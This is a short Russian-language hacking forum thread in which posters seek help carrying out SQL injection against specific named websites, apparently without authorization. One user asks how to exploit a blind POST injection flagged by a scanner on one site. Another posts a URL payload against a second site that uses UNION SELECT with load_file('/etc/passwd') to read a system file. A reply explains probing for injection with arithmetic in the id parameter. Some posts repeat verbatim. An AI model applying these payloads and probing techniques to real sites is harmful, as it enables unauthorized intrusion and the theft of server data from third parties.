Подскажите как здесь провести инъекцию.Метод POST,инъекция типа Blind,уязвимые параметры и в форме поиска ,и в форме голосования,по крайней мере так определил Acunetix Web Scanner
Я пока еще не очень дружу с Blind Sql,а тут плюс к этому еще и POST метод,что не добавляет удобства
http://kommok.ru/index.php
Подскажите как здесь провести инъекцию.Метод POST,инъекция типа Blind,уязвимые параметры и в форме поиска ,и в форме голосования,по крайней мере так определил Acunetix Web Scanner
Я пока еще не очень дружу с Blind Sql,а тут плюс к этому еще и POST метод,что не добавляет удобства
Тут есть скуль ?
http://sochi.com/pages/?id=-400+union+select+load_file('/etc/passwd')+from+mysql.user+--
По идее :
http://sochi.com/pages/?id=400
А с "-" выдаёт другой результат.
http://sochi.com/pages/?id=-400
Тут есть скуль ?
http://sochi.com/pages/?id=-400+union+select+load_file('/etc/passwd')+from+mysql.user+--
По идее :
http://sochi.com/pages/?id=400
А с "-" выдаёт другой результат.
http://sochi.com/pages/?id=-400
мдя.... слов нет....почитайка молодой человек про скули....
BuG_4F, ты не правильно понял мысль. проверяй, выполняется ли арифметическое действие, например ?id=400-1 , если появляется содержимое, которое должно появится при id=399, то можно говорить о иньекции.